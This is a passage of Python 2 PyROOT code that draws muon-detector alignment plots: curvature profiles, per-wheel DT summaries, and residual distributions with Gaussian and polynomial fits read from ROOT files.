        for i in xrange(0, int(prof.GetNbinsX()), skip):
            tmp = hist2d.ProjectionY("tmp", i+1, i + skip)
            if tmp.GetEntries() > 1:
                hist.SetBinContent(i/skip+1, tmp.GetMean())
                # Student-t quantile inflates RMS/sqrt(N) for small samples.
                hist.SetBinError(i/skip+1, ROOT.TMath.StudentQuantile(0.841345,tmp.GetEntries()) * tmp.GetRMS() / sqrt(tmp.GetEntries()))
                #hist.SetBinError(i/skip+1, tmp.GetRMS() / sqrt(tmp.GetEntries()))
            else:
                # Empty/near-empty slice: zero the point instead of plotting it.
                #hist.SetBinContent(i/skip+1, 2000.)
                #hist.SetBinError(i/skip+1, 1000.)
                hist.SetBinContent(i/skip+1, 0.)
                hist.SetBinError(i/skip+1, 0.)
        hpeaks = createPeaksProfile(hist2d, skip)
    else:
        raise Exception

    if fitgauss:
        # Constant plus a narrow (sigma = 0.01) Gaussian centered at zero.
        f = ROOT.TF1("f", "[0] + [1]*exp(-x**2/2/0.01**2)", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
        f.SetParameters(0, 0., 0.01)
        if fitpeaks: hpeaks.Fit(f, "q")
        else: hist.Fit(f, "q")
        f.SetLineColor(ROOT.kRed)
        global fitgauss_diff, fitgauss_chi2, fitgauss_ndf
        # fitter = ROOT.TVirtualFitter.GetFitter()
        # fitgauss_diff = f.GetParameter(0) - f.GetParameter(1), \
        #                 sqrt(f.GetParError(0)**2 + f.GetParError(1)**2 + 2.*fitter.GetCovarianceMatrixElement(0, 1))
        fitgauss_diff = f.GetParameter(1), f.GetParError(1)
        fitgauss_chi2 = f.GetChisquare()
        fitgauss_ndf = f.GetNDF()

    global fitline_intercept, fitline_slope
    if fitconst:
        f = ROOT.TF1("f", "[0]", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
        if fitpeaks: hpeaks.Fit(f, "q")
        else: hist.Fit(f, "q")
        f.SetLineColor(ROOT.kRed)
        fitline_intercept = f.GetParameter(0), f.GetParError(0)

    if fitline:
        f = ROOT.TF1("f", "[0] + [1]*x", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
        if fitpeaks: hpeaks.Fit(f, "qNE")
        else: hist.Fit(f, "qNE")
        f.SetLineColor(ROOT.kRed)
        global f2, f3
        # f2/f3 are the +-1 sigma slope variations (dashed, drawing disabled below).
        f2 = ROOT.TF1("2", "[0] + [1]*x", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
        f3 = ROOT.TF1("2", "[0] + [1]*x", hist.GetBinLowEdge(1), -hist.GetBinLowEdge(1))
        f2.SetParameters(f.GetParameter(0), f.GetParameter(1) + f.GetParError(1))
        f3.SetParameters(f.GetParameter(0), f.GetParameter(1) - f.GetParError(1))
        f2.SetLineColor(ROOT.kRed)
        f3.SetLineColor(ROOT.kRed)
        f2.SetLineStyle(2)
        f3.SetLineStyle(2)
        fitline_intercept = f.GetParameter(0), f.GetParError(0)
        fitline_slope = f.GetParameter(1), f.GetParError(1)

    # Draw the 2D distribution as background, axis titles chosen per param.
    hist2d.SetAxisRange(-window, window, "Y")
    hist2d.SetMarkerStyle(20)
    hist2d.SetMarkerSize(0.75)
    hist2d.GetXaxis().CenterTitle()
    hist2d.GetYaxis().CenterTitle()
    if param == "curverr":
        hist2d.GetYaxis().SetTitleOffset(1.35)
    else:
        hist2d.GetYaxis().SetTitleOffset(0.75)
    hist2d.GetXaxis().SetTitleOffset(1.2)
    hist2d.GetXaxis().SetTitleSize(0.05)
    hist2d.GetYaxis().SetTitleSize(0.05)
    hist2d.SetTitle(title)
    if param == "pterr": hist2d.SetXTitle("qp_{T} (GeV/c)")
    else: hist2d.SetXTitle("q/p_{T} (c/GeV)")
    if param == "deltax": hist2d.SetYTitle("#Deltax' (mm)")
    if param == "deltadxdz": hist2d.SetYTitle("#Deltadx'/dz (mrad)")
    if param == "pterr": hist2d.SetYTitle("#Deltap_{T}/p_{T} (%)")
    if param == "curverr": hist2d.SetYTitle("#Deltaq/p_{T} (c/GeV)")
    hist2d.Draw("colz")
    hist.SetMarkerColor(ROOT.kBlack)
    hist.SetLineColor(ROOT.kBlack)
    hist.Draw("same")
    #histCOPY = hist.Clone()
    #histCOPY.SetXTitle("")
    #histCOPY.SetYTitle("")

    #if widebins:
    #  histCOPY.Draw("samee1")
    #  histCOPY.Draw("sameaxis")
    #else:
    #  histCOPY.Draw("same")
    #  histCOPY.Draw("sameaxis")

    if fitline:
        f.Draw("same")
        #f2.Draw("same")
        #f3.Draw("same")

    # Overlay the peak profile in red.
    # NOTE(review): hpeaks is only assigned in mode=="from2d"; this line
    # would raise NameError under mode=="plain" -- confirm intended usage.
    hpeaks.SetMarkerStyle(20)
    hpeaks.SetMarkerSize(0.9)
    hpeaks.SetMarkerColor(ROOT.kRed)
    hpeaks.SetLineColor(ROOT.kRed)
    hpeaks.SetLineWidth(2)
    #if fitpeaks: hpeaks.Draw("same")
    hpeaks.Draw("same")

    #tline1 = ROOT.TLine(hist.GetBinLowEdge(1), -window, hist.GetBinLowEdge(1), window)
    #tline2 = ROOT.TLine(hist.GetBinLowEdge(1), window, -hist.GetBinLowEdge(1), window)
    #tline3 = ROOT.TLine(-hist.GetBinLowEdge(1), window, -hist.GetBinLowEdge(1), -window)
    #tline4 = ROOT.TLine(-hist.GetBinLowEdge(1), -window, hist.GetBinLowEdge(1), -window)
    # Horizontal zero-residual reference line.
    tline5 = ROOT.TLine(-hist.GetBinLowEdge(1), 0., hist.GetBinLowEdge(1), 0.)
    tline5.Draw()
    #for t in tline1, tline2, tline3, tline4, tline5: t.Draw()
def curvatureDTsummary(tfiles, window=15., pdgSfactor=False):
    """Summary of Gaussian curvature-fit amplitudes for every DT wheel/sector.

    Runs curvatureplot(..., fitgauss=True) on each wheel/sector, reads the
    fit result back through the fitgauss_* globals, and plots the fitted
    amplitude (with uncertainty) versus the sector's phi, one TGraphErrors
    per wheel on a common frame with a legend.

    window:     entries with uncertainty >= window are dropped; also the
                vertical axis half-range
    pdgSfactor: if True, scale the uncertainty by sqrt(chi2/ndf) when
                chi2/ndf > 1 (PDG-style scale factor)
    """
    # Graphs and frame are kept as globals so ROOT does not garbage-collect them.
    global h, gm2, gm1, gz, gp1, gp2, tlegend
    set_palette("blues")
    # Per-wheel lists of phi positions, fitted differences, and uncertainties.
    phis = {-2: [], -1: [], 0: [], 1: [], 2: []}
    diffs = {-2: [], -1: [], 0: [], 1: [], 2: []}
    differrs = {-2: [], -1: [], 0: [], 1: [], 2: []}
    for wheelstr, wheel in ("m2", "-2"), ("m1", "-1"), ("z", "0"), ("p1", "+1"), ("p2", "+2"):
        for sector in "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12":
            curvatureplot(tfiles, "wheel%s_sector%s" % (wheelstr, sector), "deltax",
                          title="Wheel %s, sector %s" % (wheel, sector), fitgauss=True, reset_palette=False)
            if fitgauss_diff[1] < window:
                uncertainty = fitgauss_diff[1]
                if pdgSfactor and (fitgauss_chi2/fitgauss_ndf) > 1.: uncertainty *= sqrt(fitgauss_chi2/fitgauss_ndf)
                # Sector phi is taken from the station-1 entry of signConventions.
                phis[int(wheel)].append(signConventions["DT", int(wheel), 1, int(sector)][4])
                diffs[int(wheel)].append(fitgauss_diff[0])
                differrs[int(wheel)].append(uncertainty)

    # Empty frame spanning the full phi range; graphs are drawn on top.
    h = ROOT.TH1F("h", "", 1, -pi, pi)
    h.SetAxisRange(-window, window, "Y")
    h.SetXTitle("#phi (rad)")
    h.SetYTitle("#Deltax(p_{T} #rightarrow #infty) - #Deltax(p_{T} #rightarrow 0) (mm)")
    h.GetXaxis().CenterTitle()
    h.GetYaxis().CenterTitle()

    gm2 = ROOT.TGraphErrors(len(phis[-2]), array.array("d", phis[-2]), array.array("d", diffs[-2]),
                            array.array("d", [0.]*len(phis[-2])), array.array("d", differrs[-2]))
    gm1 = ROOT.TGraphErrors(len(phis[-1]), array.array("d", phis[-1]), array.array("d", diffs[-1]),
                            array.array("d", [0.]*len(phis[-1])), array.array("d", differrs[-1]))
    gz = ROOT.TGraphErrors(len(phis[0]), array.array("d", phis[0]), array.array("d", diffs[0]),
                           array.array("d", [0.]*len(phis[0])), array.array("d", differrs[0]))
    gp1 = ROOT.TGraphErrors(len(phis[1]), array.array("d", phis[1]), array.array("d", diffs[1]),
                            array.array("d", [0.]*len(phis[1])), array.array("d", differrs[1]))
    gp2 = ROOT.TGraphErrors(len(phis[2]), array.array("d", phis[2]), array.array("d", diffs[2]),
                            array.array("d", [0.]*len(phis[2])), array.array("d", differrs[2]))

    # Distinct marker style/color per wheel.
    gm2.SetMarkerStyle(21); gm2.SetMarkerColor(ROOT.kRed); gm2.SetLineColor(ROOT.kRed)
    gm1.SetMarkerStyle(22); gm1.SetMarkerColor(ROOT.kBlue); gm1.SetLineColor(ROOT.kBlue)
    gz.SetMarkerStyle(3); gz.SetMarkerColor(ROOT.kBlack); gz.SetLineColor(ROOT.kBlack)
    gp1.SetMarkerStyle(26); gp1.SetMarkerColor(ROOT.kBlue); gp1.SetLineColor(ROOT.kBlue)
    gp2.SetMarkerStyle(25); gp2.SetMarkerColor(ROOT.kRed); gp2.SetLineColor(ROOT.kRed)

    h.Draw()
    tlegend = ROOT.TLegend(0.25, 0.2, 0.85, 0.5)
    tlegend.SetFillColor(ROOT.kWhite)
    tlegend.SetBorderSize(0)
    tlegend.AddEntry(gm2, "Wheel -2", "p")
    tlegend.AddEntry(gm1, "Wheel -1", "p")
    tlegend.AddEntry(gz, "Wheel 0", "p")
    tlegend.AddEntry(gp1, "Wheel +1", "p")
    tlegend.AddEntry(gp2, "Wheel +2", "p")
    tlegend.Draw()
    gm2.Draw("p")
    gm1.Draw("p")
    gz.Draw("p")
    gp1.Draw("p")
    gp2.Draw("p")
def getname(r):
    """Human-readable title for a report's chamber, from its postal address."""
    kind = r.postal_address[0]
    if kind == "DT":
        wheel, station, sector = r.postal_address[1:]
        return "DT wheel %d, station %d, sector %d" % (wheel, station, sector)
    elif kind == "CSC":
        endcap, station, ring, chamber = r.postal_address[1:]
        # The endcap is encoded as the station's sign: endcap 2 -> negative.
        if endcap != 1:
            station = -abs(station)
        return "CSC ME%d/%d chamber %d" % (station, ring, chamber)
# Timing accumulators shared by bellcurves()/polynomials()/printDeltaTs():
# slots 0 and 7 count calls, the other slots hold running-average stage
# durations in seconds (printDeltaTs reports them in ms).
ddt = [0.] * 17

def clearDDT():
    """Reset every timing accumulator in ddt to zero.

    Iterates over the whole list: the previous hard-coded range(0, 15)
    left the last two entries (indices 15 and 16) stale after a "clear".
    """
    for i in range(len(ddt)):
        ddt[i] = 0.
def printDeltaTs():
n = 0
for t in ddt:
if n==0 or n==7 or n==15: print "%d calls" % t
else: print "%d : %0.3f ms" % (n,t*1000.0)
n += 1
def bellcurves(tfile, reports, name, twobin=True, suppressblue=False):
    """Draw residual distributions ("bell curves") with their fits for one chamber.

    tfile:   open ROOT file containing MuonAlignmentFromReference histograms
    reports: report objects; the one whose .name equals `name` is used
    name:    chamber name (also selects the histogram directory)
    twobin:  if True, also overlay the independent "Neg" charge-bin fits
             (drawn in blue unless suppressblue)
    suppressblue: skip drawing the second (blue) fit curves

    Raises Exception if `name` is not among the reports; returns early
    (clearing the canvas) if the report's fit status is "FAIL".
    Side effects: updates the ddt timing accumulators and draws on the
    global canvas c1.
    """
    t1 = time.time()
    ddt[0] += 1  # call counter used by the running-average timings below
    tdrStyle.SetOptTitle(1)
    tdrStyle.SetTitleBorderSize(1)
    tdrStyle.SetTitleFontSize(0.1)
    tdrStyle.SetOptStat(0)
    tdrStyle.SetHistMinimumZero()

    c1.Clear()
    c1.ResetAttPad()

    # Find the report matching this chamber name.
    found = False
    for r in reports:
        if r.name == name:
            found = True
            break
    if not found: raise Exception("Not a valid name")
    if r.status == "FAIL":
        #raise Exception, "Fit failed"
        print "Fit failed"
        c1.Clear()
        return

    # With twobin the positive/negative charge samples live in separate
    # "...Pos"/"...Neg" directories; otherwise both suffixes are empty.
    Pos = "Pos"; Neg = "Neg"
    if not twobin:
        Pos = ""; Neg = ""

    pdirPos = "MuonAlignmentFromReference/%s%s" % (name, Pos)
    pdirNeg = "MuonAlignmentFromReference/%s%s" % (name, Neg)

    t2 = time.time()
    # Running average over calls of this stage's duration.
    ddt[1] = 1./ddt[0]*((ddt[0]-1)*ddt[1] + t2-t1)

    chamber_x = tfile.Get(pdirPos+"_x")
    chamber_x_fit = tfile.Get(pdirPos+"_x_fit")
    chamber_y = tfile.Get(pdirPos+"_y")
    chamber_y_fit = tfile.Get(pdirPos+"_y_fit")
    chamber_dxdz = tfile.Get(pdirPos+"_dxdz")
    chamber_dxdz_fit = tfile.Get(pdirPos+"_dxdz_fit")
    chamber_dydz = tfile.Get(pdirPos+"_dydz")
    chamber_dydz_fit = tfile.Get(pdirPos+"_dydz_fit")
    chamber_alphax = tfile.Get(pdirPos+"_alphax")
    chamber_alphax_fit = tfile.Get(pdirPos+"_alphax_fit")
    chamber_alphay = tfile.Get(pdirPos+"_alphay")
    chamber_alphay_fit = tfile.Get(pdirPos+"_alphay_fit")
    if twobin:
        chamber_x_fit2 = tfile.Get(pdirNeg+"_x_fit")
        chamber_y_fit2 = tfile.Get(pdirNeg+"_y_fit")
        chamber_dxdz_fit2 = tfile.Get(pdirNeg+"_dxdz_fit")
        chamber_dydz_fit2 = tfile.Get(pdirNeg+"_dydz_fit")
        chamber_alphax_fit2 = tfile.Get(pdirNeg+"_alphax_fit")
        chamber_alphay_fit2 = tfile.Get(pdirNeg+"_alphay_fit")

    if not chamber_x:
        # Fall back to the older naming scheme ("residual"/"resslope"/"alpha").
        chamber_x = tfile.Get(pdirPos+"_residual")
        chamber_x_fit = tfile.Get(pdirPos+"_residual_fit")
        chamber_dxdz = tfile.Get(pdirPos+"_resslope")
        chamber_dxdz_fit = tfile.Get(pdirPos+"_resslope_fit")
        chamber_alphax = tfile.Get(pdirPos+"_alpha")
        chamber_alphax_fit = tfile.Get(pdirPos+"_alpha_fit")
        if twobin:
            chamber_x_fit2 = tfile.Get(pdirNeg+"_residual_fit")
            chamber_dxdz_fit2 = tfile.Get(pdirNeg+"_resslope_fit")
            chamber_alphax_fit2 = tfile.Get(pdirNeg+"_alpha_fit")

    if not chamber_x:
        print "Can't find neither "+pdirPos+"_x nor "+pdirPos+"_residual"
        return

    t3 = time.time()
    ddt[2] = 1./ddt[0]*((ddt[0]-1)*ddt[2] + t3-t2)

    #### Axis ranges for the residual/angle distributions.
    chamber_x.SetAxisRange(-50., 50., "X")
    # Widen the window for broad distributions.
    if chamber_x.GetRMS()>15: chamber_x.SetAxisRange(-75., 75., "X")
    chamber_dxdz.SetAxisRange(-30., 30., "X")
    chamber_alphax.SetAxisRange(-50., 50., "X")
    # chamber_y is absent for chambers without y measurements.
    if not not chamber_y:
        chamber_y.SetAxisRange(-75., 75., "X")
        chamber_dydz.SetAxisRange(-120., 120., "X")
        chamber_alphay.SetAxisRange(-120., 120., "X")
        chamber_alphay.SetAxisRange(-75., 75., "Y")
    ####

    chamber_x.SetXTitle("Local x residual (mm)")
    chamber_dxdz.SetXTitle("Local dx/dz residual (mrad)")
    chamber_alphax.SetXTitle("Local dx/dz residual (mrad)")
    chamber_alphax.SetYTitle("Local x residual (mm)")
    if not not chamber_y:
        chamber_y.SetXTitle("Local y residual (mm)")
        chamber_dydz.SetXTitle("Local dy/dz residual (mrad)")
        chamber_alphay.SetXTitle("Local dy/dz residual (mrad)")
        chamber_alphay.SetYTitle("Local y residual (mm)")
    # CSC chambers measure rphi instead of local x.
    if name[0:2] == "ME":
        chamber_x.SetXTitle("Local r#phi residual (mm)")
        chamber_dxdz.SetXTitle("Local d(r#phi)/dz residual (mrad)")
        chamber_alphax.SetXTitle("Local d(r#phi)/dz residual (mrad)")
        chamber_alphax.SetYTitle("Local r#phi residual (mm)")

    t4 = time.time()
    ddt[3] = 1./ddt[0]*((ddt[0]-1)*ddt[3] + t4-t3)

    # Uniform axis cosmetics (None entries are skipped by the guard).
    for h in chamber_x, chamber_dxdz, chamber_alphax, chamber_alphax, \
             chamber_y, chamber_dydz, chamber_alphay, chamber_alphay:
        if not not h:
            h.GetXaxis().CenterTitle()
            h.GetYaxis().CenterTitle()
            h.GetXaxis().SetLabelSize(0.05)
            h.GetYaxis().SetLabelSize(0.05)
            h.GetXaxis().SetTitleSize(0.07)
            h.GetYaxis().SetTitleSize(0.07)
            h.GetXaxis().SetTitleOffset(0.9)
            h.GetYaxis().SetTitleOffset(0.9)

    if twobin:
        # The second (negative-charge) fits are drawn in blue.
        for f in chamber_x_fit2, chamber_y_fit2, chamber_dxdz_fit2, chamber_dydz_fit2, \
                 chamber_alphax_fit2, chamber_alphay_fit2:
            if not not f:
                f.SetLineColor(4)
    if not twobin:
        # Single-bin mode has no second fit to draw.
        suppressblue = True

    t5 = time.time()
    ddt[4] = 1./ddt[0]*((ddt[0]-1)*ddt[4] + t5-t4)

    global l1, l2, l3, l4
    if not not chamber_y:
        # 3x2 layout: x, dx/dz, alphax on top; y, dy/dz, alphay below.
        c1.Clear()
        c1.Divide(3, 2)
        chamber_x.SetTitle(getname(r))

        c1.GetPad(1).cd()
        chamber_x.Draw()
        if not suppressblue: chamber_x_fit2.Draw("same")
        chamber_x_fit.Draw("same")
        l1 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
                         chamber_x_fit.GetParameter(1), chamber_x_fit.GetParError(1),
                         chamber_x_fit.GetParameter(2), chamber_x_fit.GetParError(2)))
        l1.Draw()

        c1.GetPad(2).cd()
        chamber_dxdz.Draw()
        if not suppressblue: chamber_dxdz_fit2.Draw("same")
        chamber_dxdz_fit.Draw("same")
        l2 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
                         chamber_dxdz_fit.GetParameter(1), chamber_dxdz_fit.GetParError(1),
                         chamber_dxdz_fit.GetParameter(2), chamber_dxdz_fit.GetParError(2)))
        l2.Draw()

        c1.GetPad(3).cd()
        chamber_alphax.Draw("col")
        if not suppressblue: chamber_alphax_fit2.Draw("same")
        chamber_alphax_fit.Draw("same")

        c1.GetPad(4).cd()
        chamber_y.Draw()
        if not suppressblue: chamber_y_fit2.Draw("same")
        chamber_y_fit.Draw("same")
        l3 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
                         chamber_y_fit.GetParameter(1), chamber_y_fit.GetParError(1),
                         chamber_y_fit.GetParameter(2), chamber_y_fit.GetParError(2)))
        l3.Draw()

        c1.GetPad(5).cd()
        chamber_dydz.Draw()
        if not suppressblue: chamber_dydz_fit2.Draw("same")
        chamber_dydz_fit.Draw("same")
        l4 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
                         chamber_dydz_fit.GetParameter(1), chamber_dydz_fit.GetParError(1),
                         chamber_dydz_fit.GetParameter(2), chamber_dydz_fit.GetParError(2)))
        l4.Draw()

        for lb in l1,l2,l3,l4:
            lb.SetNDC(1)
            lb.SetTextColor(ROOT.kRed)

        c1.GetPad(6).cd()
        chamber_alphay.Draw("col")
        if not suppressblue: chamber_alphay_fit2.Draw("same")
        chamber_alphay_fit.Draw("same")

    else:
        # No y measurement: 3x1 layout with only the x-side plots.
        c1.Clear()
        c1.Divide(3, 1)
        chamber_x.SetTitle(getname(r))

        c1.GetPad(1).cd()
        chamber_x.Draw()
        if not suppressblue: chamber_x_fit2.Draw("same")
        chamber_x_fit.Draw("same")
        l1 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
                         chamber_x_fit.GetParameter(1), chamber_x_fit.GetParError(1),
                         chamber_x_fit.GetParameter(2), chamber_x_fit.GetParError(2)))
        l1.Draw()

        c1.GetPad(2).cd()
        chamber_dxdz.Draw()
        if not suppressblue: chamber_dxdz_fit2.Draw("same")
        chamber_dxdz_fit.Draw("same")
        l2 = ROOT.TLatex(0.67,0.8,"#splitline{#mu: %0.2f#pm%0.2f}{#sigma: %0.1f#pm%0.1f}" % (
                         chamber_dxdz_fit.GetParameter(1), chamber_dxdz_fit.GetParError(1),
                         chamber_dxdz_fit.GetParameter(2), chamber_dxdz_fit.GetParError(2)))
        l2.Draw()

        c1.GetPad(3).cd()
        chamber_alphax.Draw("col")
        if not suppressblue: chamber_alphax_fit2.Draw("same")
        chamber_alphax_fit.Draw("same")

        for lb in l1,l2:
            lb.SetNDC(1)
            lb.SetTextColor(ROOT.kRed)

    t6 = time.time()
    ddt[5] = 1./ddt[0]*((ddt[0]-1)*ddt[5] + t6-t5)
    ddt[6] = 1./ddt[0]*((ddt[0]-1)*ddt[6] + t6-t1)
def polynomials(tfile, reports, name, twobin=True, suppressblue=False):
t1 = time.time()
ddt[7] += 1
global label1, label2, label3, label4, label5, label6, label7, label8, label9
plotDirectory = "MuonAlignmentFromReference"
tdrStyle.SetOptTitle(1)
tdrStyle.SetTitleBorderSize(1)
tdrStyle.SetTitleFontSize(0.1)
tdrStyle.SetOptStat(0)
c1.Clear()
c1.ResetAttPad()
found = False
for r in reports:
if r.name == name:
found = True
break
if not found: raise Exception("Not a valid name")
if r.status == "FAIL":
#raise Exception, "Fit failed"
print "Fit failed"
c1.Clear()
return
Pos = "Pos"; Neg = "Neg"
if not twobin:
Pos = ""; Neg = ""
pdirPos = "MuonAlignmentFromReference/%s%s" % (name, Pos)
pdirNeg = "MuonAlignmentFromReference/%s%s" % (name, Neg)
global chamber_x_trackx, chamber_x_trackx_fit, chamber_y_trackx, chamber_y_trackx_fit, \
chamber_dxdz_trackx, chamber_dxdz_trackx_fit, chamber_dydz_trackx, chamber_dydz_trackx_fit, \
chamber_x_trackx_fit2, chamber_y_trackx_fit2, chamber_dxdz_trackx_fit2, chamber_dydz_trackx_fit2
global chamber_x_tracky, chamber_x_tracky_fit, chamber_y_tracky, chamber_y_tracky_fit, \
chamber_dxdz_tracky, chamber_dxdz_tracky_fit, chamber_dydz_tracky, chamber_dydz_tracky_fit, \
chamber_x_tracky_fit2, chamber_y_tracky_fit2, chamber_dxdz_tracky_fit2, chamber_dydz_tracky_fit2
global chamber_x_trackdxdz, chamber_x_trackdxdz_fit, chamber_y_trackdxdz, chamber_y_trackdxdz_fit, \
chamber_dxdz_trackdxdz, chamber_dxdz_trackdxdz_fit, chamber_dydz_trackdxdz, chamber_dydz_trackdxdz_fit, \
chamber_x_trackdxdz_fit2, chamber_y_trackdxdz_fit2, chamber_dxdz_trackdxdz_fit2, chamber_dydz_trackdxdz_fit2
global chamber_x_trackdydz, chamber_x_trackdydz_fit, chamber_y_trackdydz, chamber_y_trackdydz_fit, \
chamber_dxdz_trackdydz, chamber_dxdz_trackdydz_fit, chamber_dydz_trackdydz, chamber_dydz_trackdydz_fit, \
chamber_x_trackdydz_fit2, chamber_y_trackdydz_fit2, chamber_dxdz_trackdydz_fit2, chamber_dydz_trackdydz_fit2
chamber_x_trackx = tfile.Get(pdirPos+"_x_trackx")
chamber_x_trackx_fit = tfile.Get(pdirPos+"_x_trackx_fitline")
chamber_y_trackx = tfile.Get(pdirPos+"_y_trackx")
chamber_y_trackx_fit = tfile.Get(pdirPos+"_y_trackx_fitline")
chamber_dxdz_trackx = tfile.Get(pdirPos+"_dxdz_trackx")
chamber_dxdz_trackx_fit = tfile.Get(pdirPos+"_dxdz_trackx_fitline")
chamber_dydz_trackx = tfile.Get(pdirPos+"_dydz_trackx")
chamber_dydz_trackx_fit = tfile.Get(pdirPos+"_dydz_trackx_fitline")
chamber_x_trackx_fit2 = tfile.Get(pdirNeg+"_x_trackx_fitline")
chamber_y_trackx_fit2 = tfile.Get(pdirNeg+"_y_trackx_fitline")
chamber_dxdz_trackx_fit2 = tfile.Get(pdirNeg+"_dxdz_trackx_fitline")
chamber_dydz_trackx_fit2 = tfile.Get(pdirNeg+"_dydz_trackx_fitline")
chamber_x_tracky = tfile.Get(pdirPos+"_x_tracky")
chamber_x_tracky_fit = tfile.Get(pdirPos+"_x_tracky_fitline")
chamber_y_tracky = tfile.Get(pdirPos+"_y_tracky")
chamber_y_tracky_fit = tfile.Get(pdirPos+"_y_tracky_fitline")
chamber_dxdz_tracky = tfile.Get(pdirPos+"_dxdz_tracky")
chamber_dxdz_tracky_fit = tfile.Get(pdirPos+"_dxdz_tracky_fitline")
chamber_dydz_tracky = tfile.Get(pdirPos+"_dydz_tracky")
chamber_dydz_tracky_fit = tfile.Get(pdirPos+"_dydz_tracky_fitline")
chamber_x_tracky_fit2 = tfile.Get(pdirNeg+"_x_tracky_fitline")
chamber_y_tracky_fit2 = tfile.Get(pdirNeg+"_y_tracky_fitline")
chamber_dxdz_tracky_fit2 = tfile.Get(pdirNeg+"_dxdz_tracky_fitline")
chamber_dydz_tracky_fit2 = tfile.Get(pdirNeg+"_dydz_tracky_fitline")
chamber_x_trackdxdz = tfile.Get(pdirPos+"_x_trackdxdz")
chamber_x_trackdxdz_fit = tfile.Get(pdirPos+"_x_trackdxdz_fitline")
chamber_y_trackdxdz = tfile.Get(pdirPos+"_y_trackdxdz")
chamber_y_trackdxdz_fit = tfile.Get(pdirPos+"_y_trackdxdz_fitline")
chamber_dxdz_trackdxdz = tfile.Get(pdirPos+"_dxdz_trackdxdz")
chamber_dxdz_trackdxdz_fit = tfile.Get(pdirPos+"_dxdz_trackdxdz_fitline")
chamber_dydz_trackdxdz = tfile.Get(pdirPos+"_dydz_trackdxdz")
chamber_dydz_trackdxdz_fit = tfile.Get(pdirPos+"_dydz_trackdxdz_fitline")
chamber_x_trackdxdz_fit2 = tfile.Get(pdirNeg+"_x_trackdxdz_fitline")
chamber_y_trackdxdz_fit2 = tfile.Get(pdirNeg+"_y_trackdxdz_fitline")
chamber_dxdz_trackdxdz_fit2 = tfile.Get(pdirNeg+"_dxdz_trackdxdz_fitline")
chamber_dydz_trackdxdz_fit2 = tfile.Get(pdirNeg+"_dydz_trackdxdz_fitline")
chamber_x_trackdydz = tfile.Get(pdirPos+"_x_trackdydz")
chamber_x_trackdydz_fit = tfile.Get(pdirPos+"_x_trackdydz_fitline")
chamber_y_trackdydz = tfile.Get(pdirPos+"_y_trackdydz")
chamber_y_trackdydz_fit = tfile.Get(pdirPos+"_y_trackdydz_fitline")
chamber_dxdz_trackdydz = tfile.Get(pdirPos+"_dxdz_trackdydz")
chamber_dxdz_trackdydz_fit = tfile.Get(pdirPos+"_dxdz_trackdydz_fitline")
chamber_dydz_trackdydz = tfile.Get(pdirPos+"_dydz_trackdydz")
chamber_dydz_trackdydz_fit = tfile.Get(pdirPos+"_dydz_trackdydz_fitline")
chamber_x_trackdydz_fit2 = tfile.Get(pdirNeg+"_x_trackdydz_fitline")
chamber_y_trackdydz_fit2 = tfile.Get(pdirNeg+"_y_trackdydz_fitline")
chamber_dxdz_trackdydz_fit2 = tfile.Get(pdirNeg+"_dxdz_trackdydz_fitline")
chamber_dydz_trackdydz_fit2 = tfile.Get(pdirNeg+"_dydz_trackdydz_fitline")
if not chamber_x_trackx:
chamber_x_trackx = tfile.Get(pdirPos+"_residual_trackx")
chamber_x_trackx_fit = tfile.Get(pdirPos+"_residual_trackx_fitline")
chamber_dxdz_trackx = tfile.Get(pdirPos+"_resslope_trackx")
chamber_dxdz_trackx_fit = tfile.Get(pdirPos+"_resslope_trackx_fitline")
chamber_x_trackx_fit2 = tfile.Get(pdirNeg+"_residual_trackx_fitline")
chamber_dxdz_trackx_fit2 = tfile.Get(pdirNeg+"_resslope_trackx_fitline")
chamber_x_tracky = tfile.Get(pdirPos+"_residual_tracky")
chamber_x_tracky_fit = tfile.Get(pdirPos+"_residual_tracky_fitline")
chamber_dxdz_tracky = tfile.Get(pdirPos+"_resslope_tracky")
chamber_dxdz_tracky_fit = tfile.Get(pdirPos+"_resslope_tracky_fitline")
chamber_x_tracky_fit2 = tfile.Get(pdirNeg+"_residual_tracky_fitline")
chamber_dxdz_tracky_fit2 = tfile.Get(pdirNeg+"_resslope_tracky_fitline")
chamber_x_trackdxdz = tfile.Get(pdirPos+"_residual_trackdxdz")
chamber_x_trackdxdz_fit = tfile.Get(pdirPos+"_residual_trackdxdz_fitline")
chamber_dxdz_trackdxdz = tfile.Get(pdirPos+"_resslope_trackdxdz")
chamber_dxdz_trackdxdz_fit = tfile.Get(pdirPos+"_resslope_trackdxdz_fitline")
chamber_x_trackdxdz_fit2 = tfile.Get(pdirNeg+"_residual_trackdxdz_fitline")
chamber_dxdz_trackdxdz_fit2 = tfile.Get(pdirNeg+"_resslope_trackdxdz_fitline")
chamber_x_trackdydz = tfile.Get(pdirPos+"_residual_trackdydz")
chamber_x_trackdydz_fit = tfile.Get(pdirPos+"_residual_trackdydz_fitline")
chamber_dxdz_trackdydz = tfile.Get(pdirPos+"_resslope_trackdydz")
chamber_dxdz_trackdydz_fit = tfile.Get(pdirPos+"_resslope_trackdydz_fitline")
chamber_x_trackdydz_fit2 = tfile.Get(pdirNeg+"_residual_trackdydz_fitline")
chamber_dxdz_trackdydz_fit2 = tfile.Get(pdirNeg+"_resslope_trackdydz_fitline")
if not chamber_x_trackx:
print "Can't find neither "+pdirPos+"_residual nor "+pdirPos+"_residual_trackx"
return
chamber_x_trackx = chamber_x_trackx.Clone()
chamber_dxdz_trackx = chamber_dxdz_trackx.Clone()
chamber_x_tracky = chamber_x_tracky.Clone()
chamber_dxdz_tracky = chamber_dxdz_tracky.Clone()
chamber_x_trackdxdz = chamber_x_trackdxdz.Clone()
